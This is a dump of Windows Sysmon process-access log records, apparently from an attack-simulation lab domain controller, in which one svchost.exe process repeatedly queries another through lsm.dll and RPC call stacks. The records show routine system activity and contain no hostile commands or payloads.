12:02:18.145{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005381Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.145{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005380Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.145{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005379Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.145{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005378Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.145{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005377Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.145{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005376Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.145{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005375Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.145{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005374Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.145{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005373Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.145{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005372Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.145{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005371Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.145{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005370Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.145{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005369Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.145{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005368Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.145{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005367Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.130{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005366Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.130{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005365Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.130{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005364Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.130{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005363Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.130{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005362Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.130{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005361Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.130{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005360Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.130{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005359Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.130{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005358Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 